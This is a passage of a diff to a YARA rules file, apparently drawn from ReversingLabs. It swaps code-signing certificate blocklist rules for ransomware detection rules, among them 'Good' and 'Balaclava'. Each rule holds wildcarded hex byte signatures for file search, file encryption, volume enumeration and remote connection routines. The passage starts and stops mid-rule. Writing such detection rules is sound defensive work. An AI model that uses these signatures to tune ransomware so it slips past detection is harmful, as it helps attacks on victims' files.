+            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 16 15 28 ?? ?? ?? ?? 26 00 00 28 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 16 FE ?? 0B 07 39 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE ?? 0C 08 2C ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 00 00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 00 DE ?? 25
+            28 ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE ?? 00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 17 28 ?? ?? ?? ??
+            00 02 18 28 ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ??
+            6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 59
+        }
+		$main_ransomware_function_p2 = {
+            28 ?? ?? ?? ?? B7 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ??
+            ?? 5B 28 ?? ?? ?? ?? B7 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23
+            ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 28 ?? ?? ?? ?? B7 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ??
+            ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 28 ?? ?? ?? ?? B7 73 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ??
+            ?? ?? ?? ?? ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 28 ?? ?? ??
+            ?? B7 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F ?? DA 73 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ??
+            ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 28 ?? ?? ?? ?? B7 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 23 ?? ?? ?? ?? ??
+            ?? ?? ?? 5A 28 ?? ?? ?? ?? B7 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F
+        }
+		$search_files = {
+            00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 38 ?? ?? ?? ?? 06 6F ?? ?? ??
+            ?? 0B 07 07 6F ?? ?? ?? ?? 17 DA 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 16 FE
+            ?? 0C 08 2C ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE ?? 0D 09 2C ?? 00 02 07 07 72 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 07 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ??
+            ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 16 14 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? DE ?? 00 00 00 00 00 00 06 6F
+            ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? 00 DC DE ?? 25 28 ?? ?? ?? ??
+            13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ??
+            00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 11 ?? 6F ??
+            ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 17 DA 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ??
+            ?? ?? ?? 16 FE ?? 13 ?? 11 ?? 2C ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE ?? 13 ??
+            11 ?? 2C ?? 00 02 11 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 11 ??
+            28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 16 14 28 ?? ?? ?? ?? 26 28 ??
+            ?? ?? ?? DE ?? 00 00 00 00 00 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11
+            ?? 6F ?? ?? ?? ?? 00 DC DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 11 ?? 17 D6 13 ??
+            11 ?? 11 ?? 8E 69 FE ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? 2A
+        }
+		$encrypt_files = {
+            00 00 03 19 17 73 ?? ?? ?? ?? 0A 04 18 18 73 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 08 28 ?? ?? ?? ?? 05 6F
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 08 28 ?? ?? ?? ?? 05 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ??
+            0D 07 09 17 73 ?? ?? ?? ?? 13 ?? 06 6F ?? ?? ?? ?? 17 6A DA B7 17 D6 8D ?? ?? ?? ?? 13 ?? 06 11 ?? 16
+            11 ?? 8E 69 6F ?? ?? ?? ?? 26 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 07
+            6F ?? ?? ?? ?? 00 06 6F ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Logika OOO" and pe.signatures [ i ] . serial == "35:1f:e2:ef:dc:0a:c5:6a:0c:82:2c:f8" and 1594976475 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( all of ( $main_ransomware_function_p* ) ) and $search_files and $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_9Cfbb4C69008821Aaacecde97Ee149Ab : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Good : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Good ransomware."
 		author = "ReversingLabs"
-		id = "a8ba633b-fbbe-51ca-9f67-fb91ce9ac2f7"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "e0f97200-7fe9-5811-b6cd-708ecc3a2fbc"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4344-L4362"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Good.yara#L1-L82"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d74b13eeb5d0a57c5dd3257480230c504a68a8422e77a46bb2e101abb2c7f282"
+		logic_hash = "6737853a77a6008f9fd2141bb6b13d595f1cb7e832be944596f709e1fcdf8003"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Good"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            FF D7 53 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8D
+            85 ?? ?? ?? ?? 50 FF D7 53 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E
+            5B 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 FF D7 53 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 FF D7 53 85 C0 75 ?? 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 FF D7 53 85
+            C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8B 3D ?? ?? ??
+            ?? 33 C0 66 89 45 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ??
+            ?? ?? ?? ?? FF D7 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 8B D8 83 FB ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            5F 5E 5B 8B E5 5D C3
+        }
+		$remote_connection = {
+            55 8B EC 53 8B 5D ?? 57 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 8B 0F 8B
+            C1 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4F ?? 83 C4 ?? 8B C1 83 E8 ?? 74 ?? 83
+            E8 ?? 74 ?? 83 E8 ?? 74 ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ??
+            ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 83 C4 ?? 83 F8 ?? 77 ?? FF 24 85 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? FF 77 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 83 C4 ?? A8 ?? 74 ??
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 83 C4 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 83 7F ?? ?? 75 ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 FF
+            77 ?? FF 15 ?? ?? ?? ?? 8D 04 45 ?? ?? ?? ?? 50 FF 77 ?? 56 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 45 ?? 50 6A ?? 56 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 5E FF 77 ?? 53 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 77 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 77 ?? 53 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 77 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5B
+            5D C3
+        }
+		$encrypt_files = {
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B C8 8B F2 83 C4 ?? 2B CE 8D 71 ??
+            66 90 0F B7 0A 8D 52 ?? 66 89 4C 32 ?? 66 85 C9 75 ?? 50 FF 35 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 8B 35 ?? ?? ?? ?? 47 89 7D ?? E9 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? FF 75 ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50
+            8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ??
+            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 53
+            FF D6 8B 3D ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ??
+            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 53
+            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5
+            5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kivaliz Prest s.r.l." and ( pe.signatures [ i ] . serial == "00:9c:fb:b4:c6:90:08:82:1a:aa:ce:cd:e9:7e:e1:49:ab" or pe.signatures [ i ] . serial == "9c:fb:b4:c6:90:08:82:1a:aa:ce:cd:e9:7e:e1:49:ab" ) and 1592363914 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_C04F5D17Af872Cb2C37E3367Fe761D0D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Balaclava : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Balaclava ransomware."
 		author = "ReversingLabs"
-		id = "d7ef2bdf-afba-5254-bef2-78f4b6d5ecea"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "1a17f2e8-f161-55bc-b44e-f8f47ebd9869"
+		date = "2020-10-01"
+		modified = "2020-10-01"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4364-L4382"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Balaclava.yara#L1-L113"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4a4d60aa3722a710fe23d5e11c55a28bfe721bb4e797b041d58f62a994487799"
+		logic_hash = "01b43e6ea7ceebdbdda7e1f7c5bd2439a460b8aed4a1837755fa3679e9893ff3"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Balaclava"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            55 8B EC 83 EC ?? 53 56 8B 75 ?? 33 D2 57 6A ?? 5B 8B 7E ?? 89 55 ?? 8D 4F ?? 66 8B
+            07 03 FB 66 3B C2 75 ?? 2B F9 B9 ?? ?? ?? ?? D1 FF E8 ?? ?? ?? ?? 50 FF 76 ?? 89 45
+            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 50 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B
+            45 ?? 83 C0 ?? 89 45 ?? 8B D8 33 D2 8D 4B ?? 66 8B 03 83 C3 ?? 66 3B C2 75 ?? 2B D9
+            D1 FB 8D 04 3B 3D ?? ?? ?? ?? 7C ?? 8D 04 45 ?? ?? ?? ?? 50 39 56 ?? 74 ?? FF 76 ??
+            52 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? EB ?? 52 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ??
+            ?? ?? 39 46 ?? 74 ?? 89 46 ?? 8B 46 ?? 33 C9 66 89 0C 78 8B 55 ?? F7 02 ?? ?? ?? ??
+            0F 85 ?? ?? ?? ?? 33 D2 8B C2 6A ?? 89 45 ?? 59 89 4D ?? 3B C1 7F ?? 03 C1 8B 4D ??
+            99 2B C2 D1 F8 89 45 ?? 8B 14 85 ?? ?? ?? ?? 66 8B 01 66 3B 02 75 ?? 66 85 C0 74 ??
+            66 8B 41 ?? 66 3B 42 ?? 75 ?? 83 C1 ?? 83 C2 ?? 66 85 C0 75 ?? 33 D2 8B C2 EB ?? 1B
+            C0 83 C8 ?? 33 D2 85 C0 0F 84 ?? ?? ?? ?? 79 ?? 8B 4D ?? 8B 45 ?? 49 EB ?? 8B 45 ??
+            8B 4D ?? 40 89 45 ?? EB ?? 8B 45 ?? F6 00 ?? 0F 84 ?? ?? ?? ?? 8D 04 5D ?? ?? ?? ??
+            50 8B 46 ?? FF 75 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? 8B 46 ??
+            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
+            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7E ?? ?? 74
+            ?? 83 7E ?? ?? 7E ?? FF 76 ?? 8B 4E ?? FF 76 ?? E8 ?? ?? ?? ?? 59 59 8B 4E ?? 8D 14
+        }
+		$find_files_p2 = {
+            3B A1 ?? ?? ?? ?? 56 89 44 51 ?? 66 A1 ?? ?? ?? ?? 66 89 44 51 ?? FF 46 ?? E8 ?? ??
+            ?? ?? FF 4E ?? E9 ?? ?? ?? ?? 39 56 ?? 0F 85 ?? ?? ?? ?? 8D 04 5D ?? ?? ?? ?? 50 8B
+            46 ?? FF 75 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 5E ?? 83 C4 ?? 8B CB B8 ?? ??
+            ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ??
+            83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B CB 8D
+            51 ?? 66 8B 01 83 C1 ?? 66 3B 45 ?? 75 ?? 2B CA D1 F9 83 F9 ?? 72 ?? 8B CB 8D 51 ??
+            66 8B 01 83 C1 ?? 66 3B 45 ?? 75 ?? 2B CA D1 F9 83 C1 ?? 68 ?? ?? ?? ?? 8D 04 4B 50
+            FF 15 ?? ?? ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 A8 ?? 74 ?? 83 E0 ??
+            50 FF 76 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BB ?? ?? ?? ?? 53 FF
+            15 ?? ?? ?? ?? EB ?? 85 C0 75 ?? 6A ?? 53 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0D ??
+            ?? ?? ?? 6A ?? 58 3B C8 A1 ?? ?? ?? ?? 74 ?? 83 F8 ?? 74 ?? FF 76 ?? A1 ?? ?? ?? ??
+            33 D2 6A ?? 03 C1 59 F7 F1 FF 34 95 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 05 ?? ?? ?? ??
+            FF 05 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 6A
+            ?? 59 66 89 4C 78 ?? 33 C9 8B 46 ?? 66 89 0C 78 FF 75 ?? 8B 5D ?? 53 FF 15 ?? ?? ??
+            ?? 85 C0 74 ?? 8B 45 ?? E9 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 5D ?? 33 FF 39 7E ??
+            75 ?? 89 3E 53 FF 15 ?? ?? ?? ?? 8B DF 8B 4D ?? E8 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5
+            5D C2
+        }
+		$encrypt_files_p1 = {
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 55 ?? 8B C1 89 45 ?? C7 45 ?? ?? ??
+            ?? ?? 33 F6 89 75 ?? 83 4D ?? ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75
+            ?? 56 68 ?? ?? ?? ?? 6A ?? 56 56 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ??
+            83 FB ?? 74 ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 0B 45 ?? 74 ??
+            8B FE EB ?? 33 FF 47 89 7D ?? 85 FF 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89
+            45 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? FF 75 ?? FF D0 8B C8 A1 ?? ?? ?? ?? EB ?? 8B
+            CE 85 C9 0F 84 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? FF 75 ?? FF D0 EB ?? 8B C6 85 C0 0F 84
+            ?? ?? ?? ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 8B 7D ?? 57 53 FF 15 ?? ?? ?? ?? 85 C0 75
+            ?? 83 CF ?? 89 7D ?? E9 ?? ?? ?? ?? 8B 45 ?? 3B C6 7C ?? 8B 4D ?? 7F ?? 81 F9 ?? ??
+            ?? ?? 76 ?? 81 E9 ?? ?? ?? ?? 1B C6 50 51 33 D2 8B CB E8 ?? ?? ?? ?? 59 59 23 C2 89
+        }
+		$encrypt_files_p2 = {
+            75 ?? 85 F6 75 ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 03 C7 50 53 FF 15 ?? ?? ??
+            ?? 8B FE 89 7D ?? EB ?? 56 56 6A ?? 5A 8B CB E8 ?? ?? ?? ?? 59 59 23 C2 8B FE 89 7D
+            ?? 85 FF 75 ?? 56 8D 45 ?? 50 6A ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
+            ?? ?? 8B 4D ?? FF 71 ?? FF 71 ?? 8D 41 ?? 50 FF 71 ?? 6A ?? 5A 8B 4D ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 0F B6 C0 23 F8 89 7D ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 8B 45 ?? FF 70
+            ?? FF 70 ?? 53 FF 15 ?? ?? ?? ?? 56 8D 45 ?? 50 8B 45 ?? FF 70 ?? FF 70 ?? 53 FF 15
+            ?? ?? ?? ?? 51 8B 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 45 ?? 50 8B 55 ?? 52
+            8B 4D ?? 8B 45 ?? 03 C1 50 52 51 51 8B 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 56 8D 45 ?? 50 6A ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 53 FF 15 ?? ??
+            ?? ?? 56 56 33 D2 8B CB E8 ?? ?? ?? ?? 59 59 56 8D 45 ?? 50 FF 75 ?? FF 75 ?? 53 FF
+            15 ?? ?? ?? ?? 83 7D ?? ?? 76 ?? 8B 45 ?? 2D ?? ?? ?? ?? 8B 4D ?? 1B CE 51 50 33 D2
+            8B CB E8 ?? ?? ?? ?? 59 59 56 8D 45 ?? 50 FF 75 ?? 8B 45 ?? 03 45 ?? 50 53 FF 15 ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 4D ?? ?? E8 ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? C3
+        }
+		$find_volumes = {
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 33 DB 53 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 56 53 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ??
+            ?? 89 5D ?? 6A ?? 5B 8D B5 ?? ?? ?? ?? 8D 4E ?? 33 D2 66 8B 06 83 C6 ?? 66 3B C2 75
+            ?? 2B F1 D1 FE 66 39 9D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 66 39 9D ?? ?? ?? ?? 75 ?? 66
+            83 BD ?? ?? ?? ?? ?? 75 ?? 66 39 9D ?? ?? ?? ?? 75 ?? 66 39 9C 75 ?? ?? ?? ?? 75 ??
+            33 C0 66 89 84 75 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 66 89 9C 75 ?? ?? ?? ?? 85 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 4D ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 7D ?? 57 FF 15 ??
+            ?? ?? ?? 8B 65 ?? E8 ?? ?? ?? ?? C3
+        }
+
 	condition:
